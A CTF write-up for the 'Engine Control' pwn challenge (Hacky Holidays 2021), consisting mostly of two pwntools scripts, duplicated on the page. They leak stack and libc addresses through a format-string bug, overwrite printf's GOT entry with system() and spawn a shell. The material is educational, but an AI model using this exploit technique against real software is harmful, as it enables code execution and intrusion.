Engine Control

Writeup for Engine Control (pwn) - Hacky Holidays Space Race CTF (2021) 💜

Video Walkthrough

Challenge Description

These space engines are super powerful. Note: the .py file is merely used as a wrapper around the binary. We did not put any vulnerabilities in the wrapper (at least not on purpose). The binary is intentionally not provided, but here are some properties:

Solution

part_1.py

from pwn import *

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())

# Binary filename
exe = './engine'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (warning/info/debug)
context.log_level = 'warning'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Start program
io = start()

flag = b""

# Let's fuzz x values
for i in range(500):
    try:
        # Format the counter
        # e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int
        io.sendlineafter(':', '%{}$p'.format(i))
        io.recvuntil('(')
        # Receive the response
        result = io.recvuntil(')')[:-1]
        if not b'nil' in result:
            print(str(i) + ': ' + str(result))
            try:
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = str(decoded[::-1])
                print(reversed_hex)
                result += reversed_hex
            except BaseException:
                pass
    except EOFError:
        pass

print(flag)

# Got Shell?
io.interactive()

part_2.py

from pwn import *

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

# Function to be called by FmtStr
def send_payload(payload):
    io.sendlineafter(':', payload)
    io.recvuntil('(')
    result = io.recvuntil(') now')[:-5]
    return result

# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())

# Binary filename
exe = './engine'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (warning/info/debug)
context.log_level = 'info'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Start program
io = process(exe)

# Calculate format string offset, so we can use later in write operations
format_string = FmtStr(execute_fmt=send_payload)
info("format string offset: %d", format_string.offset)

# Start program
io = start()

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # Local lib-c
stack_pos = 33  # %33$p is __libc_start_main+234 locally

# If executing remotely lets do a few things..
if args.REMOTE:
    # Update libc to version of the server, identified and downloaded using: https://libc.blukat.me
    libc = ELF('libc6_2.27-3ubuntu1.4_amd64.so')
    # leak and update binary base address - %34$p is main function on server (not needed locally as no PIE)
    leaked_addr = int(send_payload('%{}$p'.format(34)), 16)
    info('leaked_main_addr: %#x', leaked_addr)
    elf.address = leaked_addr - elf.symbols.main
    # Offset of libc function we want to leak is different on the server
    stack_pos = 35  # %35$p is __libc_start_main+234 remotely

# Leak the __libc_start_main_ret function from the stack
leaked_addr = int(send_payload('%{}$p'.format(stack_pos)), 16)
info('leaked_libc_addr: %#x', leaked_addr)
# Calculate offsets - https://libc.blukat.me/?q=str_bin_sh%3A0x7f2863dcae1a%2Cprintf%3A0x7f2863c7bf70
libc.address = leaked_addr - (libc.symbols['__libc_start_main'] + 234)  # Update our libc library address
info('libc_base: %#x', libc.address)
info('system: %#x', libc.symbols.system)

# Overwrite got.printf address with address of system()
format_string.write(elf.got.printf, libc.symbols.system)
# Execute the write operations
format_string.execute_writes()

# Send 'sh' to the function we've overwritten with system()
io.sendline('sh')

# Profit?
io.interactive()

PreviousDeleted Flag NextWeb

Last updated 4 months ago

Solution

part_1.py

from pwn import *

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())

# Binary filename
exe = './engine'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (warning/info/debug)
context.log_level = 'warning'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Start program
io = start()

flag = b""

# Let's fuzz x values
for i in range(500):
    try:
        # Format the counter
        # e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int
        io.sendlineafter(':', '%{}$p'.format(i))
        io.recvuntil('(')
        # Receive the response
        result = io.recvuntil(')')[:-1]
        if not b'nil' in result:
            print(str(i) + ': ' + str(result))
            try:
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = str(decoded[::-1])
                print(reversed_hex)
                result += reversed_hex
            except BaseException:
                pass
    except EOFError:
        pass

print(flag)

# Got Shell?
io.interactive()

part_2.py

from pwn import *

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

# Function to be called by FmtStr
def send_payload(payload):
    io.sendlineafter(':', payload)
    io.recvuntil('(')
    result = io.recvuntil(') now')[:-5]
    return result

# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())

# Binary filename
exe = './engine'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (warning/info/debug)
context.log_level = 'info'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Start program
io = process(exe)

# Calculate format string offset, so we can use later in write operations
format_string = FmtStr(execute_fmt=send_payload)
info("format string offset: %d", format_string.offset)

# Start program
io = start()

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # Local lib-c
stack_pos = 33  # %33$p is __libc_start_main+234 locally

# If executing remotely lets do a few things..
if args.REMOTE:
    # Update libc to version of the server, identified and downloaded using: https://libc.blukat.me
    libc = ELF('libc6_2.27-3ubuntu1.4_amd64.so')
    # leak and update binary base address - %34$p is main function on server (not needed locally as no PIE)
    leaked_addr = int(send_payload('%{}$p'.format(34)), 16)
    info('leaked_main_addr: %#x', leaked_addr)
    elf.address = leaked_addr - elf.symbols.main
    # Offset of libc function we want to leak is different on the server
    stack_pos = 35  # %35$p is __libc_start_main+234 remotely

# Leak the __libc_start_main_ret function from the stack
leaked_addr = int(send_payload('%{}$p'.format(stack_pos)), 16)
info('leaked_libc_addr: %#x', leaked_addr)
# Calculate offsets - https://libc.blukat.me/?q=str_bin_sh%3A0x7f2863dcae1a%2Cprintf%3A0x7f2863c7bf70
libc.address = leaked_addr - (libc.symbols['__libc_start_main'] + 234)  # Update our libc library address
info('libc_base: %#x', libc.address)
info('system: %#x', libc.symbols.system)

# Overwrite got.printf address with address of system()
format_string.write(elf.got.printf, libc.symbols.system)
# Execute the write operations
format_string.execute_writes()

# Send 'sh' to the function we've overwritten with system()
io.sendline('sh')

# Profit?
io.interactive()